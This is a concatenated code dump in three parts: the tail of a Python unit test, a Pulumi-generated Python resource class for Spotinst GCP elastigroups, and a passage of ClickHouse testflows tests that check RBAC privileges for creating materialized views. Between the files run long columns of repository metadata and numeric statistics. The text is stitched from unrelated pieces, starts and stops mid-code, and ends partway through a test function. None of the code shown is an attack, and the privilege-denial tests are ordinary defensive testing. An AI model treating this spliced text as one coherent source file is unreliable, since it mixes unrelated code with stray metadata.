        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)
| 33.033019
| 97
| 0.540625
| 938
| 7,003
| 3.952026
| 0.101279
| 0.113299
| 0.043162
| 0.05638
| 0.870245
| 0.870245
| 0.870245
| 0.870245
| 0.870245
| 0.857297
| 0
| 0.059231
| 0.279166
| 7,003
| 211
| 98
| 33.189573
| 0.675119
| 0.027702
| 0
| 0.794702
| 0
| 0
| 0.081984
| 0
| 0
| 0
| 0
| 0
| 0.119205
| 1
| 0.072848
| false
| 0
| 0.046358
| 0
| 0.13245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ab5fe2f3da88d15101f855927dbfd27ae8336f9
| 29,805
|
py
|
Python
|
sdk/python/pulumi_spotinst/gcp/elastigroup.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/gcp/elastigroup.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/gcp/elastigroup.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Elastigroup(pulumi.CustomResource):
auto_healing: pulumi.Output[bool]
availability_zones: pulumi.Output[list]
"""
List of availability zones for the group.
"""
backend_services: pulumi.Output[list]
description: pulumi.Output[str]
"""
The region your GCP group will be created in.
"""
desired_capacity: pulumi.Output[float]
"""
The desired number of instances the group should have at any time.
"""
disks: pulumi.Output[list]
draining_timeout: pulumi.Output[float]
"""
Time (seconds) the instance is allowed to run after it is detached from the group. This is to allow the instance time to drain all the current TCP connections before terminating it.
"""
fallback_to_ondemand: pulumi.Output[bool]
"""
Activate fallback-to-on-demand. When provisioning an instance, if no Preemptible market is available, fallback-to-on-demand will provision an On-Demand instance to maintain the group capacity.
"""
gpu: pulumi.Output[list]
health_check_grace_period: pulumi.Output[float]
health_check_type: pulumi.Output[str]
instance_types_customs: pulumi.Output[list]
"""
Defines a set of custom instance types. Required if instance_types_preemptible and instance_types_ondemand are not set.
* `memoryGib` (`float`) - The memory (in GiB) in the custom instance types. GCP has a number of limitations on accepted memory values.For more information, see the GCP documentation (here.)[https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#specifications]
* `vcpu` (`float`)
"""
instance_types_ondemand: pulumi.Output[str]
"""
The regular VM instance type to use for mixed-type groups and when falling back to on-demand. Required if instance_types_preemptible is not set.
"""
instance_types_preemptibles: pulumi.Output[list]
"""
The preemptible VMs instance type. To maximize cost savings and market availability, select as many types as possible. Required if instance_types_ondemand is not set.
"""
integration_docker_swarm: pulumi.Output[dict]
integration_gke: pulumi.Output[dict]
ip_forwarding: pulumi.Output[bool]
labels: pulumi.Output[list]
"""
Array of objects with key-value pairs.
* `key` (`str`) - Labels key.
* `value` (`str`) - Labels value.
"""
max_size: pulumi.Output[float]
"""
The maximum number of instances the group should have at any time.
"""
metadatas: pulumi.Output[list]
"""
Array of objects with key-value pairs.
* `key` (`str`) - Labels key.
* `value` (`str`) - Labels value.
"""
min_size: pulumi.Output[float]
"""
The minimum number of instances the group should have at any time.
"""
name: pulumi.Output[str]
"""
The group name.
"""
network_interfaces: pulumi.Output[list]
ondemand_count: pulumi.Output[float]
preemptible_percentage: pulumi.Output[float]
"""
Percentage of Preemptible VMs to spin up from the "desired_capacity".
"""
scaling_down_policies: pulumi.Output[list]
scaling_up_policies: pulumi.Output[list]
scheduled_tasks: pulumi.Output[list]
service_account: pulumi.Output[str]
"""
The email of the service account in which the group instances will be launched.
"""
shutdown_script: pulumi.Output[str]
"""
The Base64-encoded shutdown script that executes prior to instance termination, for more information please see: [Shutdown Script](https://api.spotinst.com/integration-docs/elastigroup/concepts/compute-concepts/shutdown-scripts/)
"""
startup_script: pulumi.Output[str]
"""
Create and run your own startup scripts on your virtual machines to perform automated tasks every time your instance boots up.
"""
subnets: pulumi.Output[list]
"""
A list of regions and subnets.
* `region` (`str`) - The region for the group of subnets.
* `subnetNames` (`list`) - The names of the subnets in the region.
"""
tags: pulumi.Output[list]
"""
Tags to mark created instances.
"""
unhealthy_duration: pulumi.Output[float]
def __init__(__self__, resource_name, opts=None, auto_healing=None, availability_zones=None, backend_services=None, description=None, desired_capacity=None, disks=None, draining_timeout=None, fallback_to_ondemand=None, gpu=None, health_check_grace_period=None, health_check_type=None, instance_types_customs=None, instance_types_ondemand=None, instance_types_preemptibles=None, integration_docker_swarm=None, integration_gke=None, ip_forwarding=None, labels=None, max_size=None, metadatas=None, min_size=None, name=None, network_interfaces=None, ondemand_count=None, preemptible_percentage=None, scaling_down_policies=None, scaling_up_policies=None, scheduled_tasks=None, service_account=None, shutdown_script=None, startup_script=None, subnets=None, tags=None, unhealthy_duration=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a Spotinst elastigroup GCP resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] availability_zones: List of availability zones for the group.
:param pulumi.Input[str] description: The region your GCP group will be created in.
:param pulumi.Input[float] desired_capacity: The desired number of instances the group should have at any time.
:param pulumi.Input[float] draining_timeout: Time (seconds) the instance is allowed to run after it is detached from the group. This is to allow the instance time to drain all the current TCP connections before terminating it.
:param pulumi.Input[bool] fallback_to_ondemand: Activate fallback-to-on-demand. When provisioning an instance, if no Preemptible market is available, fallback-to-on-demand will provision an On-Demand instance to maintain the group capacity.
:param pulumi.Input[list] instance_types_customs: Defines a set of custom instance types. Required if instance_types_preemptible and instance_types_ondemand are not set.
:param pulumi.Input[str] instance_types_ondemand: The regular VM instance type to use for mixed-type groups and when falling back to on-demand. Required if instance_types_preemptible is not set.
:param pulumi.Input[list] instance_types_preemptibles: The preemptible VMs instance type. To maximize cost savings and market availability, select as many types as possible. Required if instance_types_ondemand is not set.
:param pulumi.Input[list] labels: Array of objects with key-value pairs.
:param pulumi.Input[float] max_size: The maximum number of instances the group should have at any time.
:param pulumi.Input[list] metadatas: Array of objects with key-value pairs.
:param pulumi.Input[float] min_size: The minimum number of instances the group should have at any time.
:param pulumi.Input[str] name: The group name.
:param pulumi.Input[float] preemptible_percentage: Percentage of Preemptible VMs to spin up from the "desired_capacity".
:param pulumi.Input[str] service_account: The email of the service account in which the group instances will be launched.
:param pulumi.Input[str] shutdown_script: The Base64-encoded shutdown script that executes prior to instance termination, for more information please see: [Shutdown Script](https://api.spotinst.com/integration-docs/elastigroup/concepts/compute-concepts/shutdown-scripts/)
:param pulumi.Input[str] startup_script: Create and run your own startup scripts on your virtual machines to perform automated tasks every time your instance boots up.
:param pulumi.Input[list] subnets: A list of regions and subnets.
:param pulumi.Input[list] tags: Tags to mark created instances.
The **backend_services** object supports the following:
* `locationType` (`pulumi.Input[str]`)
* `namedPorts` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `ports` (`pulumi.Input[list]`)
* `scheme` (`pulumi.Input[str]`)
* `serviceName` (`pulumi.Input[str]`)
The **disks** object supports the following:
* `autoDelete` (`pulumi.Input[bool]`)
* `boot` (`pulumi.Input[bool]`)
* `deviceName` (`pulumi.Input[str]`)
* `initializeParams` (`pulumi.Input[list]`)
* `diskSizeGb` (`pulumi.Input[str]`)
* `diskType` (`pulumi.Input[str]`)
* `sourceImage` (`pulumi.Input[str]`)
* `interface` (`pulumi.Input[str]`)
* `mode` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
The **gpu** object supports the following:
* `count` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
The **instance_types_customs** object supports the following:
* `memoryGib` (`pulumi.Input[float]`) - The memory (in GiB) in the custom instance types. GCP has a number of limitations on accepted memory values.For more information, see the GCP documentation (here.)[https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#specifications]
* `vcpu` (`pulumi.Input[float]`)
The **integration_docker_swarm** object supports the following:
* `masterHost` (`pulumi.Input[str]`)
* `masterPort` (`pulumi.Input[float]`)
The **integration_gke** object supports the following:
* `autoUpdate` (`pulumi.Input[bool]`)
* `autoscaleCooldown` (`pulumi.Input[float]`)
* `autoscaleDown` (`pulumi.Input[dict]`)
* `evaluationPeriods` (`pulumi.Input[float]`)
* `autoscaleHeadroom` (`pulumi.Input[dict]`)
* `cpuPerUnit` (`pulumi.Input[float]`)
* `memoryPerUnit` (`pulumi.Input[float]`)
* `numOfUnits` (`pulumi.Input[float]`)
* `autoscaleIsAutoConfig` (`pulumi.Input[bool]`)
* `autoscaleIsEnabled` (`pulumi.Input[bool]`)
* `autoscaleLabels` (`pulumi.Input[list]`)
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
* `cluster_id` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`)
The **labels** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **metadatas** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **network_interfaces** object supports the following:
* `accessConfigs` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `type` (`pulumi.Input[str]`)
* `aliasIpRanges` (`pulumi.Input[list]`)
* `ipCidrRange` (`pulumi.Input[str]`)
* `subnetworkRangeName` (`pulumi.Input[str]`)
* `network` (`pulumi.Input[str]`)
The **scaling_down_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scaling_up_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scheduled_tasks** object supports the following:
* `cronExpression` (`pulumi.Input[str]`)
* `isEnabled` (`pulumi.Input[bool]`)
* `maxCapacity` (`pulumi.Input[str]`)
* `minCapacity` (`pulumi.Input[str]`)
* `targetCapacity` (`pulumi.Input[str]`)
* `taskType` (`pulumi.Input[str]`)
The **subnets** object supports the following:
* `region` (`pulumi.Input[str]`) - The region for the group of subnets.
* `subnetNames` (`pulumi.Input[list]`) - The names of the subnets in the region.
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/elastigroup_gcp.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['auto_healing'] = auto_healing
__props__['availability_zones'] = availability_zones
__props__['backend_services'] = backend_services
__props__['description'] = description
if desired_capacity is None:
raise TypeError("Missing required property 'desired_capacity'")
__props__['desired_capacity'] = desired_capacity
__props__['disks'] = disks
__props__['draining_timeout'] = draining_timeout
__props__['fallback_to_ondemand'] = fallback_to_ondemand
__props__['gpu'] = gpu
__props__['health_check_grace_period'] = health_check_grace_period
__props__['health_check_type'] = health_check_type
__props__['instance_types_customs'] = instance_types_customs
__props__['instance_types_ondemand'] = instance_types_ondemand
__props__['instance_types_preemptibles'] = instance_types_preemptibles
__props__['integration_docker_swarm'] = integration_docker_swarm
__props__['integration_gke'] = integration_gke
__props__['ip_forwarding'] = ip_forwarding
__props__['labels'] = labels
__props__['max_size'] = max_size
__props__['metadatas'] = metadatas
__props__['min_size'] = min_size
__props__['name'] = name
__props__['network_interfaces'] = network_interfaces
__props__['ondemand_count'] = ondemand_count
__props__['preemptible_percentage'] = preemptible_percentage
__props__['scaling_down_policies'] = scaling_down_policies
__props__['scaling_up_policies'] = scaling_up_policies
__props__['scheduled_tasks'] = scheduled_tasks
__props__['service_account'] = service_account
__props__['shutdown_script'] = shutdown_script
__props__['startup_script'] = startup_script
__props__['subnets'] = subnets
__props__['tags'] = tags
__props__['unhealthy_duration'] = unhealthy_duration
super(Elastigroup, __self__).__init__(
'spotinst:gcp/elastigroup:Elastigroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, auto_healing=None, availability_zones=None, backend_services=None, description=None, desired_capacity=None, disks=None, draining_timeout=None, fallback_to_ondemand=None, gpu=None, health_check_grace_period=None, health_check_type=None, instance_types_customs=None, instance_types_ondemand=None, instance_types_preemptibles=None, integration_docker_swarm=None, integration_gke=None, ip_forwarding=None, labels=None, max_size=None, metadatas=None, min_size=None, name=None, network_interfaces=None, ondemand_count=None, preemptible_percentage=None, scaling_down_policies=None, scaling_up_policies=None, scheduled_tasks=None, service_account=None, shutdown_script=None, startup_script=None, subnets=None, tags=None, unhealthy_duration=None):
"""
Get an existing Elastigroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] availability_zones: List of availability zones for the group.
:param pulumi.Input[str] description: The region your GCP group will be created in.
:param pulumi.Input[float] desired_capacity: The desired number of instances the group should have at any time.
:param pulumi.Input[float] draining_timeout: Time (seconds) the instance is allowed to run after it is detached from the group. This is to allow the instance time to drain all the current TCP connections before terminating it.
:param pulumi.Input[bool] fallback_to_ondemand: Activate fallback-to-on-demand. When provisioning an instance, if no Preemptible market is available, fallback-to-on-demand will provision an On-Demand instance to maintain the group capacity.
:param pulumi.Input[list] instance_types_customs: Defines a set of custom instance types. Required if instance_types_preemptible and instance_types_ondemand are not set.
:param pulumi.Input[str] instance_types_ondemand: The regular VM instance type to use for mixed-type groups and when falling back to on-demand. Required if instance_types_preemptible is not set.
:param pulumi.Input[list] instance_types_preemptibles: The preemptible VMs instance type. To maximize cost savings and market availability, select as many types as possible. Required if instance_types_ondemand is not set.
:param pulumi.Input[list] labels: Array of objects with key-value pairs.
:param pulumi.Input[float] max_size: The maximum number of instances the group should have at any time.
:param pulumi.Input[list] metadatas: Array of objects with key-value pairs.
:param pulumi.Input[float] min_size: The minimum number of instances the group should have at any time.
:param pulumi.Input[str] name: The group name.
:param pulumi.Input[float] preemptible_percentage: Percentage of Preemptible VMs to spin up from the "desired_capacity".
:param pulumi.Input[str] service_account: The email of the service account in which the group instances will be launched.
:param pulumi.Input[str] shutdown_script: The Base64-encoded shutdown script that executes prior to instance termination, for more information please see: [Shutdown Script](https://api.spotinst.com/integration-docs/elastigroup/concepts/compute-concepts/shutdown-scripts/)
:param pulumi.Input[str] startup_script: Create and run your own startup scripts on your virtual machines to perform automated tasks every time your instance boots up.
:param pulumi.Input[list] subnets: A list of regions and subnets.
:param pulumi.Input[list] tags: Tags to mark created instances.
The **backend_services** object supports the following:
* `locationType` (`pulumi.Input[str]`)
* `namedPorts` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `ports` (`pulumi.Input[list]`)
* `scheme` (`pulumi.Input[str]`)
* `serviceName` (`pulumi.Input[str]`)
The **disks** object supports the following:
* `autoDelete` (`pulumi.Input[bool]`)
* `boot` (`pulumi.Input[bool]`)
* `deviceName` (`pulumi.Input[str]`)
* `initializeParams` (`pulumi.Input[list]`)
* `diskSizeGb` (`pulumi.Input[str]`)
* `diskType` (`pulumi.Input[str]`)
* `sourceImage` (`pulumi.Input[str]`)
* `interface` (`pulumi.Input[str]`)
* `mode` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
The **gpu** object supports the following:
* `count` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
The **instance_types_customs** object supports the following:
* `memoryGib` (`pulumi.Input[float]`) - The memory (in GiB) in the custom instance types. GCP has a number of limitations on accepted memory values.For more information, see the GCP documentation (here.)[https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#specifications]
* `vcpu` (`pulumi.Input[float]`)
The **integration_docker_swarm** object supports the following:
* `masterHost` (`pulumi.Input[str]`)
* `masterPort` (`pulumi.Input[float]`)
The **integration_gke** object supports the following:
* `autoUpdate` (`pulumi.Input[bool]`)
* `autoscaleCooldown` (`pulumi.Input[float]`)
* `autoscaleDown` (`pulumi.Input[dict]`)
* `evaluationPeriods` (`pulumi.Input[float]`)
* `autoscaleHeadroom` (`pulumi.Input[dict]`)
* `cpuPerUnit` (`pulumi.Input[float]`)
* `memoryPerUnit` (`pulumi.Input[float]`)
* `numOfUnits` (`pulumi.Input[float]`)
* `autoscaleIsAutoConfig` (`pulumi.Input[bool]`)
* `autoscaleIsEnabled` (`pulumi.Input[bool]`)
* `autoscaleLabels` (`pulumi.Input[list]`)
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
* `cluster_id` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`)
The **labels** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **metadatas** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **network_interfaces** object supports the following:
* `accessConfigs` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `type` (`pulumi.Input[str]`)
* `aliasIpRanges` (`pulumi.Input[list]`)
* `ipCidrRange` (`pulumi.Input[str]`)
* `subnetworkRangeName` (`pulumi.Input[str]`)
* `network` (`pulumi.Input[str]`)
The **scaling_down_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scaling_up_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scheduled_tasks** object supports the following:
* `cronExpression` (`pulumi.Input[str]`)
* `isEnabled` (`pulumi.Input[bool]`)
* `maxCapacity` (`pulumi.Input[str]`)
* `minCapacity` (`pulumi.Input[str]`)
* `targetCapacity` (`pulumi.Input[str]`)
* `taskType` (`pulumi.Input[str]`)
The **subnets** object supports the following:
* `region` (`pulumi.Input[str]`) - The region for the group of subnets.
* `subnetNames` (`pulumi.Input[list]`) - The names of the subnets in the region.
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/elastigroup_gcp.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["auto_healing"] = auto_healing
__props__["availability_zones"] = availability_zones
__props__["backend_services"] = backend_services
__props__["description"] = description
__props__["desired_capacity"] = desired_capacity
__props__["disks"] = disks
__props__["draining_timeout"] = draining_timeout
__props__["fallback_to_ondemand"] = fallback_to_ondemand
__props__["gpu"] = gpu
__props__["health_check_grace_period"] = health_check_grace_period
__props__["health_check_type"] = health_check_type
__props__["instance_types_customs"] = instance_types_customs
__props__["instance_types_ondemand"] = instance_types_ondemand
__props__["instance_types_preemptibles"] = instance_types_preemptibles
__props__["integration_docker_swarm"] = integration_docker_swarm
__props__["integration_gke"] = integration_gke
__props__["ip_forwarding"] = ip_forwarding
__props__["labels"] = labels
__props__["max_size"] = max_size
__props__["metadatas"] = metadatas
__props__["min_size"] = min_size
__props__["name"] = name
__props__["network_interfaces"] = network_interfaces
__props__["ondemand_count"] = ondemand_count
__props__["preemptible_percentage"] = preemptible_percentage
__props__["scaling_down_policies"] = scaling_down_policies
__props__["scaling_up_policies"] = scaling_up_policies
__props__["scheduled_tasks"] = scheduled_tasks
__props__["service_account"] = service_account
__props__["shutdown_script"] = shutdown_script
__props__["startup_script"] = startup_script
__props__["subnets"] = subnets
__props__["tags"] = tags
__props__["unhealthy_duration"] = unhealthy_duration
return Elastigroup(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 52.289474
| 837
| 0.642174
| 3,330
| 29,805
| 5.532432
| 0.102703
| 0.128969
| 0.089671
| 0.036693
| 0.875047
| 0.86582
| 0.862129
| 0.860283
| 0.856592
| 0.850404
| 0
| 0.00031
| 0.242208
| 29,805
| 569
| 838
| 52.381371
| 0.815372
| 0.525147
| 0
| 0.014085
| 1
| 0
| 0.153218
| 0.041839
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0.007042
| 0.042254
| 0.014085
| 0.338028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aedbd18c7a8ab92fafc990f678ebc13d8633de4
| 141,998
|
py
|
Python
|
tests/testflows/rbac/tests/views/materialized_view.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 1
|
2022-02-27T15:21:20.000Z
|
2022-02-27T15:21:20.000Z
|
tests/testflows/rbac/tests/views/materialized_view.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 16
|
2022-02-14T15:53:29.000Z
|
2022-03-25T18:39:16.000Z
|
tests/testflows/rbac/tests/views/materialized_view.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | null | null | null |
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@contextmanager
def allow_experimental_alter_materialized_view_structure(node):
    """Temporarily add the `allow_experimental_alter_materialized_view_structure=1`
    setting to the current context's default query settings, removing it again
    on exit.

    :param node: cluster node (unused directly here; kept for call-site symmetry)
    """
    setting = ("allow_experimental_alter_materialized_view_structure", 1)
    default_query_settings = None
    try:
        with Given(
            "I add allow_experimental_alter_materialized_view_structure to the default query settings"
        ):
            # NOTE(review): `getsattr` (not builtin `getattr`) — presumably a
            # get-or-set helper from the star-imported rbac/testflows helpers
            # that also stores the default list on the context; verify it is
            # defined there and not a typo.
            default_query_settings = getsattr(
                current().context, "default_query_settings", []
            )
            default_query_settings.append(setting)
        yield
    finally:
        with Finally(
            "I remove allow_experimental_alter_materialized_view_structure from the default query settings"
        ):
            if default_query_settings:
                try:
                    # Remove only the first matching entry; if another teardown
                    # already removed it, ValueError is deliberately ignored.
                    default_query_settings.pop(default_query_settings.index(setting))
                except ValueError:
                    pass
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Create("1.0"),
)
def create(self, node=None):
    """Test the RBAC functionality of the `CREATE MATERIALIZED VIEW` command."""
    # Every scenario shares the same setup; run them in declaration order.
    scenarios = [
        create_without_create_view_privilege,
        create_with_create_view_privilege_granted_directly_or_via_role,
        create_with_revoked_create_view_privilege_revoked_directly_or_from_role,
        create_without_source_table_privilege,
        create_with_source_table_privilege_granted_directly_or_via_role,
        create_with_subquery_privilege_granted_directly_or_via_role,
        create_with_join_query_privilege_granted_directly_or_via_role,
        create_with_union_query_privilege_granted_directly_or_via_role,
        create_with_join_union_subquery_privilege_granted_directly_or_via_role,
        create_with_nested_views_privilege_granted_directly_or_via_role,
        create_with_target_table_privilege_directly_or_via_role,
        create_with_populate_privilege_granted_directly_or_via_role,
        create_with_populate_source_table_privilege_granted_directly_or_via_role,
    ]
    for scenario in scenarios:
        Scenario(run=scenario, setup=instrument_clickhouse_server_log)
@TestScenario
def create_without_create_view_privilege(self, node=None):
    """Negative check: a user without CREATE VIEW privilege must be denied
    when creating a materialized view.
    """
    if node is None:
        node = self.context.node
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    denied_query = f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
    with user(node, f"{user_name}"):
        with When("I try to create a view without CREATE VIEW privilege as the user"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                denied_query,
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )
@TestScenario
def create_with_create_view_privilege_granted_directly_or_via_role(self, node=None):
    """Run the CREATE VIEW outline twice: privilege granted directly to the
    user, then granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        direct = Scenario(
            test=create_with_create_view_privilege,
            name="create with create view privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=create_with_create_view_privilege,
            name="create with create view privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_create_view_privilege(self, grant_target_name, user_name, node=None):
    """Grant CREATE VIEW to the target and verify the user can create the view."""
    view_name = f"view_{getuid()}"
    node = self.context.node if node is None else node
    create_query = f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
    try:
        with When("I grant the CREATE VIEW privilege"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
        with Then("I try to create a view without privilege as the user"):
            node.query(
                create_query,
                settings=[("user", f"{user_name}")],
            )
    finally:
        # Always clean up the view, even if the create step failed.
        with Then("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_revoked_create_view_privilege_revoked_directly_or_from_role(
    self, node=None
):
    """Run the revoked-privilege outline twice: privilege revoked directly
    from the user, then revoked from a role the user holds.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        direct = Scenario(
            test=create_with_revoked_create_view_privilege,
            name="create with create view privilege revoked directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=create_with_revoked_create_view_privilege,
            name="create with create view privilege revoked from a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_revoked_create_view_privilege(
    self, grant_target_name, user_name, node=None
):
